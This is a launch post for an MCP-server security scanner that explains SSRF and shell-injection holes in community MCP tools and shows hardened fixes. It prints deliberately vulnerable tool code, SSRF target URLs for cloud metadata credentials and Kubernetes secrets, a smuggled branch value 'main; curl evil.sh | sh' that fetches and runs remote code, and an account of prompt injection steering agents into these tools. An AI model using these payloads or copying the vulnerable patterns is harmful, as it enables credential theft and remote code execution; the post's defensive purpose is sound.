Launch post · 2026-04-23

Why 36.7% of community MCP servers fail a basic SSRF check

A public 2026 scan of community Model Context Protocol servers found SSRF in more than a third of them and unsafe command execution in 43%. Here is what that actually looks like in code, why existing dependency scanners miss it, and why we built SkillAudit to change the signal.

The context nobody set up

Model Context Protocol went from a published spec to a community with more than 8,000 servers indexed across a dozen registries in under a year. Claude skills followed the same curve. Each server is not just a library — it is a bundle of capability your agent inherits at install time: tools it can call, files it can read, endpoints it can hit, shells it can open. "I ran claude plugin install" is today's equivalent of "I ran curl | sh" from some repo you found on Twitter.

The supply-chain problem was imported into LLM tooling before anyone shipped a scanner. Anthropic's own official skills directory now requires a security review before listing, and that is a floor, not a ceiling. The vast majority of MCP servers and Claude skills are published elsewhere — on awesome-mcp lists, on npm, on indie registries. There is no neutral, fast, reproducible audit a skill author can run against their own repo before shipping, and no automatic gate a team lead can enforce before adoption.

So we went back and read the public scan data.

What "36.7% SSRF" actually means

Server-side request forgery, in one line: the server fetches a URL that an untrusted caller controls, and the fetch reaches resources the caller was never supposed to reach. In a web app it is usually how attackers pivot into the cloud metadata service and steal IAM credentials. In an MCP server, it is the same vulnerability class — except the "untrusted caller" is the LLM itself, and the LLM's input is driven by whatever prompt-injected content ended up in the chat window.

Concretely, the pattern looks like this:

// ssrf-primitive.ts — a tool that ships in more than one in three
// community MCP servers we sampled.
server.addTool({
  name: "get_url_content",
  description: "Fetch the content of a URL.",
  parameters: { url: { type: "string" } },
  handler: async ({ url }) => {
    const res = await fetch(url);                 // <-- no validation
    return await res.text();
  },
});

That tool looks benign, and it is sometimes genuinely useful. It is also a working primitive for:

  - hitting http://169.254.169.254/latest/meta-data/iam/security-credentials/ on an EC2 host and returning the AWS role credentials;
  - hitting http://kubernetes.default.svc/api/v1/namespaces/kube-system/secrets from a pod and returning cluster secrets;
  - hitting http://localhost:6379/ or http://internal-db:5432/ and probing internal services that were never meant to face the outside world.

The model does not need to be "jailbroken" to call this tool against the metadata endpoint — it just needs a user message that looks like "please fetch the contents of that url for me," or a README it was asked to summarize that contains a hostile instruction. Prompt injection is the universal trigger. The vulnerability was always in the tool surface.
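What closing that hole looks like is simple in outline: resolve the target host and refuse private, loopback, and link-local ranges before fetching. Here is a minimal sketch of that check — the names `safeFetch` and `isBlockedAddress` are illustrative, not a real library API, and this is a starting point rather than a complete defense (it assumes Node 18+ for the global fetch and does not handle DNS rebinding between the lookup and the connect):

```typescript
// A minimal SSRF guard sketch: resolve the hostname, then refuse
// loopback, RFC 1918, link-local, and similar internal ranges.
import { lookup } from "node:dns/promises";
import { isIP } from "node:net";

const BLOCKED_RANGES: RegExp[] = [
  /^127\./,                       // loopback
  /^10\./,                        // RFC 1918
  /^172\.(1[6-9]|2\d|3[01])\./,   // RFC 1918 (172.16.0.0/12)
  /^192\.168\./,                  // RFC 1918
  /^169\.254\./,                  // link-local, incl. cloud metadata
  /^0\./,                         // "this network"
  /^::1$/, /^f[cd]/i,             // IPv6 loopback, unique-local
];

export function isBlockedAddress(addr: string): boolean {
  return BLOCKED_RANGES.some((re) => re.test(addr));
}

export async function safeFetch(rawUrl: string): Promise<string> {
  const url = new URL(rawUrl);
  if (url.protocol !== "http:" && url.protocol !== "https:") {
    throw new Error(`blocked protocol: ${url.protocol}`);
  }
  // Resolve first, so a DNS name cannot smuggle in a private IP.
  const addr = isIP(url.hostname)
    ? url.hostname
    : (await lookup(url.hostname)).address;
  if (isBlockedAddress(addr)) {
    throw new Error(`blocked address: ${addr}`);
  }
  const res = await fetch(url);
  return res.text();
}
```

Even this sketch would have stopped every one of the three pivots listed above, which is the point: the fix is a dozen lines, and almost nobody ships it.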

What "43% unsafe command-exec" actually means

The other half of the public scan's finding was even more direct: 43% of sampled servers exposed a tool that eventually feeds caller-controlled input into child_process.exec, subprocess.run(..., shell=True), os.system, backticks in Ruby, or the equivalent in Go. The canonical shape:

// rce-primitive.ts — a convenience "git" tool, reprinted in dozens of
// community servers with no input escaping.
import { exec as execCb } from "node:child_process";
import { promisify } from "node:util";
const exec = promisify(execCb);

server.addTool({
  name: "git_log",
  description: "Get the git log for a branch.",
  parameters: { branch: { type: "string" } },
  handler: async ({ branch }) => {
    const { stdout } = await exec(`git log ${branch}`);  // <-- shell injection
    return stdout;
  },
});

A branch name of "main; curl evil.sh | sh" is a working remote-code-execution primitive against any host that installs this skill. There is no safe model-level defense. System-prompt instructions like "never run destructive commands" are not security controls — they are a polite request. Prompt injection can override them with high reliability in every model we tested in 2026, and in production you must assume the model is compromised. The MCP server is the real perimeter, and 43% of community servers have a hole in it.
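The structural fix is to keep the shell out of the loop entirely: validate the input, then pass it as an argument array via execFile, which spawns git directly with no shell to parse metacharacters. A hedged sketch — `isSafeBranchName` and `gitLog` are illustrative names, not a real library API, and the allowed-character set here is deliberately conservative:

```typescript
// Hardened shape: no shell, plus an allow-list on the argument itself.
import { execFile } from "node:child_process";
import { promisify } from "node:util";

const execFileP = promisify(execFile);

export function isSafeBranchName(branch: string): boolean {
  // Word chars, dots, slashes, hyphens only; reject option-shaped input
  // so "--upload-pack=..." style tricks fail along with "; curl | sh".
  return /^[\w./-]+$/.test(branch) && !branch.startsWith("-");
}

export async function gitLog(branch: string): Promise<string> {
  if (!isSafeBranchName(branch)) {
    throw new Error(`invalid branch name: ${branch}`);
  }
  // execFile takes args as an array: the value is never shell-parsed.
  const { stdout } = await execFileP("git", ["log", branch]);
  return stdout;
}
```

With this shape, the hostile branch name above becomes a validation error instead of a running process — and even without the allow-list, execFile alone would reduce it to a git error.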

Why Snyk and Dependabot miss this

We built SkillAudit because existing scanners are solving a different problem. Snyk, Dependabot, OSV-Scanner, Trivy, and every generic SAST tool we evaluated have three blind spots that together make them the wrong tool for this ecosystem:

  1. No model of the tool surface. These scanners look at your dependency tree and sometimes your code for known-CVE signatures. They do not model the fact that every MCP tool definition is, effectively, a remote-call endpoint that an attacker can trigger through the model. A tool exposing fetch(url) with no allow-list is not a "vulnerability" to a tree-scanner — it is just a function call. In an MCP context, it is the vulnerability.
  2. No semantic understanding of the prompt surface. A Claude skill's README and tool descriptions are not docs — they are part of the attack surface. The model reads them. Prompt-injection payloads routinely live in tool descriptions, in default prompts, or in metadata embedded in files the tool is asked to summarize. Generic scanners do not read English for adversarial intent.
  3. No cross-client compatibility signal. The same skill behaves differently under Claude Code, Cursor, Windsurf, and Codex CLI. A tool schema that silently breaks on Cursor's stricter validator looks fine to every dependency scanner and is the reason half the "it works on my machine" bug reports exist. Compatibility is a review axis, not a side effect.

The answer is not "more scanners." The answer is a scanner that was designed for this stack.
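To make the first blind spot concrete, here is a toy version of the kind of tool-surface signal involved — emphatically not SkillAudit's engine (the real check needs an AST, data-flow tracking, and the tool schema), just a sketch of why "a function call" and "a vulnerability" are the same bytes viewed through different lenses. The pattern IDs are invented for illustration:

```typescript
// Toy static signal: flag handlers that pass a bare parameter into
// fetch(), or interpolate one into a shell template passed to exec().
const RISK_PATTERNS: Array<{ id: string; re: RegExp }> = [
  { id: "ssrf/unvalidated-fetch", re: /\bfetch\(\s*\w+\s*\)/ },
  { id: "exec/shell-interpolation", re: /\bexec\(\s*`[^`]*\$\{/ },
];

export function scanSource(src: string): string[] {
  return RISK_PATTERNS.filter(({ re }) => re.test(src)).map(({ id }) => id);
}
```

Run against the two primitives printed earlier in this post, both fire; run against a fetch of a hard-coded URL, neither does. A dependency-tree scanner never looks at this layer at all.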

The six axes of SkillAudit

SkillAudit takes a GitHub URL — or an npm package name, or an uploaded ZIP — of any Claude skill or MCP server and returns a graded report card across six axes in roughly 60 seconds.

Each axis is graded A / B / C / warn / fail, with an explanation and, where applicable, a remediation hint. The report is public by default — you can embed a badge in your README the same way you embed a Snyk or codecov badge — and a private deep report is available on Pro.

What is live today

The landing page, the waitlist, the methodology, and the public-scan reference data are live today at skillaudit.dev. The audit engine itself is still in development: the static parse and the LLM-assisted probe are implemented behind a feature flag and are being hardened against the first batch of real repos before we open scans to the public. The first 100 free audits go to waitlist signups in the order they joined.

This is a build-in-public launch. We will be transparent about what works and what does not: you will see the engine tighten in weekly blog posts, and you will see the grade distribution across the first 100 scans published as a follow-up to this post. Nothing about the numbers will be smoothed.

The ask

If you publish a Claude skill or MCP server — or if you run a team that installs them — join the waitlist at skillaudit.dev. If you have a specific MCP server you want scanned first (yours, or one you are about to install and do not trust), email it to hello@skillaudit.dev with "scan first" in the subject. We are building the ground-truth dataset in public, and your most-feared MCP server is exactly the shape of repo the engine is being trained on first.

The stat that opens this post — 36.7% SSRF, 43% command-exec — is a floor, not a ceiling. It came from a static scan of a sample. The actual number is probably worse once you include prompt-injection surface, credential leakage in logs, and schemas that silently break across clients. Trust should not depend on whoever happened to star a repo on GitHub. We are building the signal that does not.


Written by the SkillAudit team. Public 2026 MCP-server scan figures cited from community reporting at developersdigest.tech, effloow.com, and apigene.ai. If you have corrections or additional scan data, please email hello@skillaudit.dev — we will update this post and credit sources.

Ready to audit your skill before you ship?

Join the waitlist →